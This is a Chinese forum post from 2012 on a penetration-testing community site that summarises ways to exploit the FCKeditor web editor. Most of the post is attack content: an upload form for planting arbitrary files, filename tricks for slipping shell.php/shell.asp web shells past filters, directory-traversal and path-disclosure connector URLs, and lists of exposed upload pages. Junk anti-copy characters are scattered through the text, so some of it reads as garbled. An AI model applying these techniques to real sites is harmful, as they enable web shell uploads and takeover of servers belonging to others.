中国网络渗透测试联盟

标题: FCKeditor漏洞利用总结 [打印本页]

作者: 荒村狂客    时间: 2012-9-5 20:23
标题: FCKeditor漏洞利用总结
Fckeditor漏洞利用总结

查看编辑器版本2 G. R) r. ~3 x1 C0 M! \+ U6 R
FCKeditor/_whatsnew.html. c; Z% ^3 J& z$ ?" i" ]) u
—————————————————————————————————————————————————————————————

2. Version 2.2 版本
/ P5 W+ u) `2 m" z& EApache+linux 环境下在上传文件后面加个.突破!测试通过。
  q. |+ L' c5 N5 U! B—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
' y# t! G3 f0 N<form id="frmUpload" enctype="multipart/form-data"1 {8 T% m. _6 A' g! Y- I8 M
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
! K1 L' s9 _# Z& b0 Q1 u, B0 s* o<input type="file" name="NewFile" size="50"><br>
  V5 w6 ~6 z; j( o/ U<input id="btnUpload" type="submit" value="Upload">. s: F4 h. g2 y: m" F8 f
</form>
0 A6 O; f5 f  J& @—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法# V6 [8 T- X9 ]0 w" q
        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
; c" L$ p7 F. j% m3 U6 [    4.1:提交shell.php+空格绕过; @+ s6 D' {, {8 |# c  H
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。/ X4 W( ~' q; Z+ ?  d. D) U- B
    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。9 ~& \8 T$ a/ h. n+ J* B8 e1 [* W5 U2 `
—————————————————————————————————————————————————————————————

5. 突破建立文件夹
, Y# X4 v: R( W" I; l& @FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
- `& ^  S, |0 gFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
2 Y1 H$ n  d* u—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址
3 T7 Q& Z1 o5 t" \FCKeditor/editor/filemanager/browser/default/connectors/test.html8 T) o0 c8 S( Z" L. s
FCKeditor/editor/filemanager/upload/test.html$ y2 L0 A# I+ y4 w: @, v, |
FCKeditor/editor/filemanager/connectors/test.html
# Y1 W8 e5 [) t/ AFCKeditor/editor/filemanager/connectors/uploadtest.html
" G" p. ^& l1 P$ u% r' n/ I1 M—————————————————————————————————————————————————————————————# F# D2 ~" D$ T3 T

7.常用上传地址
7 |; `0 s% w9 e8 k. S  SFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
: z' |. {; U. \/ qFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
: ^* `0 k: e9 c4 s+ h; e' JFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)! b& \  `  _0 j  @3 W8 G
JSP 版:
) s8 L+ q/ U8 j; EFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
! \2 d5 L7 u8 B! u注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
, L! j. }( }+ w/ q. N+ H件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。. g, J1 J& d  o) ^1 z& X" r0 x
—————————————————————————————————————————————————————————————

8.其他上传地址0 t( k8 e: l: G
FCKeditor/_samples/default.html/ e1 n0 B5 z  m* a
FCKeditor/_samples/asp/sample01.asp
& M9 Q! T- I  j! yFCKeditor/_samples/asp/sample02.asp7 S1 i9 w# E5 K% p  r) B
FCKeditor/_samples/asp/sample03.asp7 y7 |% _7 M/ a% I, Q7 v
FCKeditor/_samples/asp/sample04.asp
# ?& K0 @! L6 Z$ P一般很多站点都已删除_samples 目录,可以试试。
) d* N8 \- K! e9 ], `FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。+ k1 D  Y. b  g% j2 f
—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址8 O1 p0 V0 Z+ v/ S% x
Version 2.4.1 测试通过
# j) u$ `' r( x) d修改CurrentFolder 参数使用 ../../来进入不同的目录1 i2 P* j; N( A. h/ N  i" e8 z
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
3 g0 ?; ?8 {) c5 U根据返回的XML 信息可以查看网站所有的目录。
1 q' R% m8 ]1 q) PFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
9 i& T/ [. g3 X' S* z- ]2 |也可以直接浏览盘符:
; g( _$ @$ R0 m: _4 Z% YJSP 版本:
9 ]& B; l4 [( d! HFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
. e$ ~  j3 Y% B0 [8 d3 U* N% X—————————————————————————————————————————————————————————————

10.爆路径漏洞: x  D( Y- `( @% ~0 }7 X
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
- q2 b% ^$ h) N+ Z7 O  u4 u. `' P—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题
7 Y% j  {& O8 \- |9 n  c        影响版本: FCKeditor x.x <= FCKeditor v2.4.3
! [* n- Y5 a  t$ E$ v6 W7 @- P$ V脆弱描述:- P! k2 @2 L6 {$ i8 `. Y
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:# D8 b  |6 H) m9 R# k
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
7 J2 Y; F! m7 A. E& C, T5 `Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!% U. S) G3 W5 Q8 [; `( M0 H
        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。' Y/ o0 |& ~8 u$ P2 \( X4 M( t
        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!


作者: admin    时间: 2012-9-8 22:43
[attach]41[/attach]




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2